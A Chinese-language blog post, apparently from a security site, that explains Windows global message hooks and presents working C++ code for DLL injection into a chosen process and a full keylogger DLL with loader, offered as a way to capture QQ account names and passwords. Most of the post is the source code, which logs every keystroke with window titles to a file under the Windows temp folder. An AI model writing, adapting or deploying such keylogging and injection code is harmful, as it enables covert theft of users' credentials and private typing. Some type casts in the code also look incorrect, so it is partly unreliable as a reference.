全局鉤子注入-注入QQ獲取賬號密碼實現
VSole2022-04-24 06:09:26
全局鉤子注入-獲取QQ密碼實現
全局鉤子注入-獲取QQ密碼實現 水一篇?????
SetWindowsHookExA
將應用程序定義的掛鉤過程安裝到掛鉤鏈中。您將安裝一個掛鉤程序來監視系統中某些類型的事件。這些事件與特定線程或與調用線程相同的桌面中的所有線程相關聯。
HHOOK SetWindowsHookExA( [in] int idHook, [in] HOOKPROC lpfn, [in] HINSTANCE hmod, [in] DWORD dwThreadId );
官網文檔 :https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa
第一個參數表示鉤子的類型,WH_GETMESSAGE表示安裝消息隊列的消息鉤子(類型比較多 詳情可以看文檔),它可以監控發送到消息隊列的消息。第二個參數表示鉤子回調函數。第三個參數表示包含鉤子回調函數的dll句柄,如果要設置全局鉤子,則該參數必須指定dll模塊句柄。第四個參數表示域鉤子關聯的線程id,0表示全局鉤子。
UnhookWindowsHookEx
刪除通過SetWindowsHookEx函數安裝的鉤子。
BOOL UnhookWindowsHookEx( [in] HHOOK hhk );
簡單代碼實現dll注入
#include
#include
#include
HHOOK g_hook;
FARPROC procaddr;
HMODULE Hdll;
LRESULT GetMessPro(int code, WPARAM wParam, LPARAM lparam);
//定義注入函數
BOOL SetGlobalHook()
{
//要注入的進程id
int dwPid = 776;
//使用進程快照 遍歷進程 獲取線程id
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwPid);
THREADENTRY32 te32 = { sizeof(THREADENTRY32) };
BOOL bRet = Thread32First(hSnap, &te32);
if (bRet)
{
do
{
if (te32.th32OwnerProcessID == dwPid)
{
//安裝鉤子實現dll注入 第一個參數安裝消息鉤子 第二個參數使用的dll中的函數 第三個參數是dll句柄 第4個參數線程id 如果是全局的用0
g_hook = SetWindowsHookExW(WH_GETMESSAGE, (HOOKPROC)procaddr, (HINSTANCE)Hdll, te32.th32ThreadID);
break;
}
} while (Thread32Next(hSnap, &te32));
}
if (g_hook == NULL)
{
printf("SetGlobalHook error");
}
return TRUE;
}
void main()
{
//加載dll 獲取函數地址 執行注入函數
Hdll = LoadLibraryW(L"ConsoleApplication4.dll");
procaddr = GetProcAddress(Hdll, "mess");
SetGlobalHook();
system("pause");
}
通過setWindowsHookEx()實現鍵盤記錄器
實現原理當按下鍵盤,產生一個消息,按鍵消息加入到系統消息隊列 操作系統從消息隊列中取出消息,添加到相應的程序的消息隊列中 ;
應用程序使用消息Hook從自身的消息隊列中取出消息WM_KEYDOWN,調用消息處理函數。我們可以在系統消息隊列之間添加消息鉤子,從而使得在系統消息隊列消息發給應用程序之前捕獲到消息。
可以多次添加鉤子,從而形成一個鉤子鏈,可以依次調用函數。
QQ最新版可以直接獲取輸入的賬號密碼
代碼實現 下面的代碼忘記從哪里保存的了 太久了 注釋里有作者id PeterZheng
// ConsoleApplication1.cpp : 此文件包含 "main" 函數。程序執行將在此處開始并結束。
//
#include
#include
#include
#include
#include
using namespace std;
typedef BOOL(*StartHook)();
int main()
{
HMODULE hModule = LoadLibraryW(L"Dll1.dll");
if (hModule == NULL)
{
std::cout << GetLastError();
return 0;
}
StartHook STHK = (StartHook)GetProcAddress(hModule, "StartHook");
if (STHK == NULL)
{
return 0;
}
BOOL bRet = STHK();
if (bRet)
{
MessageBoxW(NULL, L"Hook Success", L"SetHook", 0);
}
else
{
MessageBoxW(NULL, L"Hook Error", L"SetHook", 0);
return 0;
}
Sleep(100000);
return 0;
}
// 運行程序: Ctrl + F5 或調試 >“開始執行(不調試)”菜單
// 調試程序: F5 或調試 >“開始調試”菜單
// 入門使用技巧:
// 1. 使用解決方案資源管理器窗口添加/管理文件
// 2. 使用團隊資源管理器窗口連接到源代碼管理
// 3. 使用輸出窗口查看生成輸出和其他消息
// 4. 使用錯誤列表窗口查看錯誤
// 5. 轉到“項目”>“添加新項”以創建新的代碼文件,或轉到“項目”>“添加現有項”以將現有代碼文件添加到項目
// 6. 將來,若要再次打開此項目,請轉到“文件”>“打開”>“項目”并選擇 .sln 文件
//dll
//
//
// FileName : KbHook.cpp
// Creator : PeterZheng
// Date : 2019/2/12 09:32
// Comment : Keyboard Hook Demo
//
//
#include
#include
#include
#include
#include
using namespace std;
//本文件模塊句柄
HINSTANCE g_hInstance = NULL;
// HOOK鉤子句柄
HHOOK g_hHook = NULL;
// 鍵盤記錄日志路徑
const CHAR KEYBOARD_LOG[30] = "c:\\windows\\temp\\data.txt";
// 字符串緩沖區默認長度
const SHORT BUFF_LENGTH = 100;
CONST DWORD KeyMask = 0x80000000;
// 創建共享內存段
// param szPreTitle 保存上一個文件標題
#pragma data_seg("sharedata")
CHAR szPreTitle[BUFF_LENGTH] = { 0 };
#pragma data_seg()
#pragma comment(linker, "/SECTION:sharedata,RWS")
CHAR szBuff[BUFF_LENGTH] = { 0 };
/*
使用“表驅動”的方式進行鍵位映射,可減少大多數鍵盤記錄器中存在的大量if-else結構的情況,
大幅度縮小程序體積。
*/
// 鍵盤虛擬映射值表
CONST UCHAR SPECIAL_SIGN_MAPPING_TABLE[][20] = {
{192, 189, 187, 219, 221, 220, 186, 222, 188, 190, 191},
{VK_F1, VK_F2, VK_F3, VK_F4, VK_F5, VK_F6, VK_F7, VK_F8, VK_F9, VK_F10, VK_F11, VK_F12},
{VK_ESCAPE, VK_TAB, VK_CONTROL, VK_MENU, VK_LWIN, VK_RWIN, VK_INSERT, VK_DELETE, VK_HOME, VK_RETURN, VK_SPACE},
{VK_NUMLOCK, VK_BACK, VK_END, VK_PRIOR, VK_NEXT, VK_CANCEL, VK_CLEAR, VK_SELECT, VK_PRINT, VK_EXECUTE, VK_LEFT, VK_RIGHT, VK_UP, VK_DOWN},
{VK_ADD, VK_SUBTRACT, VK_MULTIPLY, VK_DIVIDE, 190, 110},
{VK_NUMPAD0, VK_NUMPAD1, VK_NUMPAD2, VK_NUMPAD3, VK_NUMPAD4, VK_NUMPAD5, VK_NUMPAD6, VK_NUMPAD7, VK_NUMPAD8, VK_NUMPAD9}
};
// 真實字符映射碼表
CONST CHAR* CONST OBJECT_SIGN_MAPPING_TABLE[][20] = {
{"0", "1", "2", "3", "4", "5", "6", "7", "8", "9"},
{ "!", "@", "#", "$", "%", "^", "&", "*", "(", ")" },
{ "`", "-", "=", "[", "]", "\\", ";", "\'", ",", ".", "/" },
{ "~", "_", "+", "{", "}", "\\|", ":", "\"", "<", ">", "?" },
{ "[F1]", "[F2]", "[F3]", "[F4]", "[F5]", "[F6]", "[F7]", "[F8]", "[F9]", "[F10]", "[F11]", "[F12]" },
{"[ESCAPE]", "[TAB]", "[CTRL]", "[ALT]", "[LWIN]", "[RWIN]", "[INSERT]", "[DELETE]", "[HOME]", "[Enter]", "[SPACE]"},
{"[NUMLOCK]", "[BACKSPACE]", "[END]", "[PGUP]", "[PGDOWN]", "[CANCEL]", "[CLEAR]", "[SELECT]", "[PRINT]", "[EXCUTE]", "[←]", "[→]", "[↑]", "[↓]" },
{"+", "-", "*", "/", ".", "."},
{"0", "1", "2", "3", "4", "5", "6", "7", "8", "9"},
};
// Dll執行入口
BOOL APIENTRY DllMain(_In_ void* _DllHandle, _In_ unsigned long _Reason, _In_opt_ void* _Reserved)
{
g_hInstance = (HINSTANCE)_DllHandle;
switch (_Reason)
{
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_DETACH:
if (g_hHook != NULL)
{
UnhookWindowsHookEx(g_hHook);
}
break;
}
return TRUE;
}
// 獲取當前本地時間
VOID GetFmLocalTime(CHAR* szFmTime)
{
ZeroMemory(szFmTime, BUFF_LENGTH);
SYSTEMTIME sys_t;
GetLocalTime(&sys_t);
sprintf_s(szFmTime, BUFF_LENGTH, "%4d/%02d/%02d %02d:%02d:%02d ", sys_t.wYear, sys_t.wMonth, sys_t.wDay, sys_t.wHour, sys_t.wMinute, sys_t.wSecond);
return;
}
// 把字符保存到文件
VOID SetDataToFile(CHAR *buff)
{
HANDLE hFile = CreateFile((LPCWSTR)KEYBOARD_LOG, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
MessageBox(NULL, L"CreateFile Error", L"Tips", MB_OK);
return;
}
if (SetFilePointer(hFile, 0, NULL, FILE_END) == -1)
{
MessageBox(NULL, L"SetFilePointer Error", L"Tips", MB_OK);
return;
}
DWORD dwWrite = 0;
if (!WriteFile(hFile, buff, strlen(buff), &dwWrite, NULL))
{
MessageBox(NULL, L"WriteFile Error", L"Tips", MB_OK);
return;
}
CloseHandle(hFile);
return;
}
// 鍵盤鉤子回調函數
LRESULT CALLBACK KeyHookProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if (nCode < 0)
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
if (nCode == HC_ACTION)
{
MSG *p = (MSG*)lParam;
//判斷是否由擊鍵消息
if (p->message == WM_KEYDOWN)
{
UCHAR vKey = (UCHAR)p->wParam;
ZeroMemory(szBuff, BUFF_LENGTH);
// 時間和標題信息字符串
CHAR szInsert[BUFF_LENGTH] = "\0";
// 當前窗口名
CHAR szNowTitle[BUFF_LENGTH] = "\0";
HWND hForegroundWnd = GetForegroundWindow();
GetWindowText(hForegroundWnd, (LPWSTR)szNowTitle, BUFF_LENGTH);
if (strcmp(szNowTitle, szPreTitle) != 0)
{
// 格式化時間字符串
CHAR szFmLocalTime[BUFF_LENGTH] = "\0";
GetFmLocalTime(szFmLocalTime);
strcat_s(szInsert, BUFF_LENGTH, "\r\r< ");
strcat_s(szInsert, BUFF_LENGTH, szFmLocalTime);
strcat_s(szInsert, BUFF_LENGTH, szNowTitle);
strcat_s(szInsert, BUFF_LENGTH, " >\r\r");
strcpy_s(szPreTitle, BUFF_LENGTH, szNowTitle);
SetDataToFile(szInsert);
}
DWORD iShift = GetKeyState(VK_SHIFT);
DWORD iCapital = GetKeyState(VK_CAPITAL);
DWORD iNumLock = GetKeyState(VK_NUMLOCK);
BOOL bShift = (iShift & KeyMask) == KeyMask;
BOOL bCapital = (iCapital & 1) == 1;
BOOL bNumLock = (iNumLock & 1) == 1;
// 頂部數字鍵
if (vKey >= '0' && vKey <= '9')
{
if (!bShift)
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[0][vKey - '0']);
}
else
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[1][vKey - '0']);
}
goto END;
}
// 標點符號鍵
for (int i = 0; i < 11; i++)
{
if (vKey == SPECIAL_SIGN_MAPPING_TABLE[0][i])
{
if (!bShift)
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[2][i]);
}
else
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[3][i]);
}
goto END;
}
}
// 字母鍵
if (vKey >= 'A' && vKey <= 'Z')
{
if (bShift || bCapital)
{
szBuff[0] = vKey;
}
else
{
szBuff[0] = vKey + 32;
}
goto END;
}
// F1 - F12 鍵
for (int i = 0; i < 12; i++)
{
if (vKey == SPECIAL_SIGN_MAPPING_TABLE[1][i])
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[4][i]);
goto END;
}
}
// 特殊功能鍵
for (int i = 0; i < 11; i++)
{
if (vKey == SPECIAL_SIGN_MAPPING_TABLE[2][i])
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[5][i]);
goto END;
}
}
for (int i = 0; i < 14; i++)
{
if (vKey == SPECIAL_SIGN_MAPPING_TABLE[3][i])
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[6][i]);
goto END;
}
}
// 小鍵盤
for (int i = 0; i < 6; i++)
{
if (vKey == SPECIAL_SIGN_MAPPING_TABLE[4][i] && bNumLock)
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[7][i]);
goto END;
}
}
for (int i = 0; i < 10; i++)
{
if (vKey == SPECIAL_SIGN_MAPPING_TABLE[5][i] && bNumLock)
{
strcat_s(szBuff, BUFF_LENGTH, OBJECT_SIGN_MAPPING_TABLE[0][i]);
goto END;
}
}
END:
SetDataToFile(szBuff);
}
}
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}
// 部署全局鉤子
extern"C" __declspec(dllexport) BOOL StartHook()
{
if (g_hHook != NULL)
return FALSE;
//安裝鉤子
g_hHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)KeyHookProc, g_hInstance, NULL);
return TRUE;
}
// 卸載鉤子
BOOL StopHook()
{
if (g_hHook != NULL)
{
if (!UnhookWindowsHookEx(g_hHook))
return FALSE;
g_hHook = NULL;
}
return TRUE;
}
VSole
網絡安全專家